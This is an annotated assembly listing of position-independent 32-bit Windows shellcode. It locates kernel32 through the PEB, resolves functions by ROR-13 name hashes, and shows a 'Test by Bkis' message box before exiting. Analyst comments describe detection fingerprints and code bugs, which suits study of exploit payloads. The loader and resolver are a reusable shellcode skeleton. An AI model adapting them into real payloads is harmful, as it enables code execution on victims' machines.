;-----------------------------------------------------------------------
; Self-contained 32-bit Windows shellcode (Intel syntax, MASM-style
; `DWORD ptr` / `fs:` operands).  Flow, as written on this page:
;   1. find the base of KERNEL32.DLL by walking the PEB loader list
;      (a separate Win9x path is taken when the PEB pointer is "negative");
;   2. resolve LoadLibraryA from kernel32's export table by comparing a
;      ROR-13 hash of every export name against a precomputed constant;
;   3. LoadLibraryA("User32.dll"), resolve MessageBox the same way and
;      show "Test by Bkis";
;   4. resolve ExitProcess and terminate.
;
; Register roles across the main flow:
;   eax = module base being worked on (kernel32, then user32)
;   ebx = output of Get_Address_From_EDT (resolved export address)
;   edx = LoadLibraryA address (only valid until the next resolver call,
;         which clobbers edx)
;   edi = hash constant handed to the resolver on the stack
;
; Analyst notes: the fs:[0x30] PEB read, the `ror edi, 0xd` / `add edi, eax`
; name-hash loop and the three hash constants (0xec0e4e8e, 0xbc4da2a8,
; 0x73e2d87e) are the kind of static fingerprint detection rules key on.
; Strings are placed directly after `call` instructions so their addresses
; come from the pushed return address rather than from any relocation.
;-----------------------------------------------------------------------

; Get the base address of Kernel32.dll
find_kernel32:
        xor     eax, eax
        mov     eax, fs:[eax+0x30]     ; eax -> PEB (fs:[0x30] is the TEB's PEB pointer)
        test    eax, eax               ; sign bit of the PEB address
        js      find_kernel32_9x       ; high-half address: author treats this as Win9x
find_kernel32_nt:                      ; otherwise Windows NT/2000/XP (per the author)
        mov     eax, [eax + 0x0c]      ; eax -> loader data (list of loaded modules)
        mov     esi, [eax + 0x1c]      ; esi -> first entry of that module list
        lodsd                          ; eax -> next entry; assumed to describe Kernel32.DLL
                                       ; (true on the NT/2000/XP the author targets; not
                                       ; guaranteed on other versions).  NOTE(review): lodsd
                                       ; depends on DF being clear, but `cld` is only executed
                                       ; later inside compute_hash
        mov     eax, [eax + 0x8]       ; eax -> base address of Kernel32.DLL
        jmp     find_kernel32_finished ; done locating Kernel32.DLL
find_kernel32_9x:
        mov     eax, [eax + 0x34]      ; Win9x-specific offsets as given by the author;
        lea     eax, [eax + 0x7c]      ; not verified here
        mov     eax, [eax + 0x3c]
find_kernel32_finished:                ; EAX: base address of KERNEL32.DLL

; Get the address of LoadLibrary()
        mov     edi,0xec0e4e8e         ; hash of LoadLibraryA
        push    edi                    ; hash argument (read as [esp+12] inside the resolver)
        call    Get_Address_From_EDT   ; -> ebx = address of the export whose name hashes to edi
        pop     edi                    ; discard the hash argument
        mov     edx, ebx               ; keep LoadLibraryA's address in edx
; EDX holds the address of LoadLibrary

; Get the base of USER32.DLL using LoadLibrary
        push    eax                    ; save Kernel32.dll base (restored after MessageBox)
        jmp     strUser32              ; jmp/call pair pushes the address of "User32.dll"
find_mudule_dll:
        call    edx                    ; LoadLibrary("User32.dll"); the callee pops its argument
; EAX holds the base of USER32.DLL

; Get the address of MessageBox in USER32.DLL
        mov     edi,0xbc4da2a8         ; hash of MessageBox (per the author's comment)
        push    edi
        call    Get_Address_From_EDT   ; -> ebx = matching export address (edx is clobbered here)
        pop     edi
; EBX holds the address of MessageBox

; Call MessageBox
        xor     eax,eax
        push    eax                    ; uType = MB_OK (0)
        jmp     strContenu             ; pushes the address of "Test by Bkis", returns to lauch_msgbox
lauch_msgbox :
        pop     eax                    ; eax -> "Test by Bkis"
        push    eax                    ; title (same string)
        push    eax                    ; message
        xor     eax,eax
        push    eax                    ; hWnd = NULL
        call    ebx                    ; MessageBox(NULL, message, title, MB_OK)
        pop     eax                    ; restore the Kernel32.dll base saved before LoadLibrary
        jmp     finish_shelcode

;-----------------------------------------------------------------------
; Get_Address_From_EDT - resolve an export by hashing names in the
; module's Export Directory Table
; In:    eax     = module base (preserved on return)
;        [esp+4] = 32-bit hash of the wanted export name, pushed by the
;                  caller immediately before `call` (caller pops it again)
; Out:   ebx     = VA of the export whose name hash matches
; Clobb: ecx, edx, esi, edi, flags
; Hash:  h = 0; for each byte c until NUL: h = ror(h, 13) + c
; NOTE(review): there is no "not found" exit - see find_function_loop.
;-----------------------------------------------------------------------
Get_Address_From_EDT:                  ; input eax: module base
        push    eax                    ; save module base (restored into eax before ret)
find_function:
        mov     edi, eax               ; edi -> module base
        mov     eax, [edi + 0x3c]      ; eax = e_lfanew (offset of the PE header)
        mov     edx, [edi + eax + 0x78]; RVA of the export directory
        add     edx, edi               ; edx -> Export Directory Table
        mov     ecx, [edx + 0x18]      ; ecx = number of exported names (loop counter)
        mov     ebx, [edx + 0x20]
        add     ebx, edi               ; ebx -> Export Name Pointer Table
find_function_loop:
        dec     ecx                    ; index runs count-1 .. 0.  NOTE(review): nothing stops
                                       ; the loop when ecx passes 0 without a match - an
                                       ; unknown hash wraps the index and reads past the table
        mov     esi, DWORD ptr [ebx + ecx * 4]
        add     esi, edi               ; esi -> NUL-terminated name of one export
        push    edi                    ; save module base; edi becomes the hash accumulator
compute_hash:
        xor     edi, edi
        xor     eax, eax               ; eax zeroed so lodsb's byte in al is zero-extended
        cld
compute_hash_again:
        lodsb
        test    al, al
        jz      compute_hash_finished  ; NUL ends the name
        ror     edi, 0xd               ; h = ror(h, 13)
        add     edi, eax               ; h += byte
        jmp     compute_hash_again
compute_hash_finished:
find_function_compare:
        cmp     edi, [esp+12]          ; [esp]=saved edi (module base), [esp+4]=saved eax,
                                       ; [esp+8]=return address, [esp+12]=hash from the caller
        pop     edi                    ; restore module base (flags from cmp survive the pop)
        jnz     find_function_loop
        mov     ebx, [edx + 0x24]
        add     ebx, edi               ; ebx -> Ordinal Table
        mov     cx, [ebx + 2 * ecx]    ; 16-bit ordinal written into cx only; the upper half of
                                       ; ecx keeps the loop index's upper bits, so this relies
                                       ; on the name index fitting in 16 bits
        mov     ebx, [edx + 0x1c]
        add     ebx, edi               ; ebx -> Address Table
        mov     ebx, [ebx + 4 * ecx]
        add     ebx, edi               ; ebx -> VA of the matching export (the source comment
                                       ; "GetProcAddress" here is stale: the result is whichever
                                       ; export matched the hash)
find_function_finished:
        pop     eax                    ; restore the module base into eax
        ret                            ; EBX is the address of the wanted function

finish_shelcode:
        ;popad
        jmp     _end

; Data area - each string follows a `call`, so the call pushes the
; string's address and lands on the code that consumes it
strUser32:
        call    find_mudule_dll
        db ‘User32.dll’,0
strContenu:
        call    lauch_msgbox
        db ‘Test by Bkis’,0

; Program termination
_end:                                  ; eax: KERNEL32.DLL base.  The source comment says
                                       ; "ebx: GETPROCADDRESS", but ebx still holds the
                                       ; MessageBox address here; it is overwritten below
; Call ExitProcess
        mov     edi,0x73e2d87e         ; hash of ExitProcess
        push    edi
        call    Get_Address_From_EDT   ; -> ebx = matching export address
        pop     edi
finish_program:
        push    1                      ; uExitCode = 1
        call    ebx                    ; ExitProcess(1) - terminates the process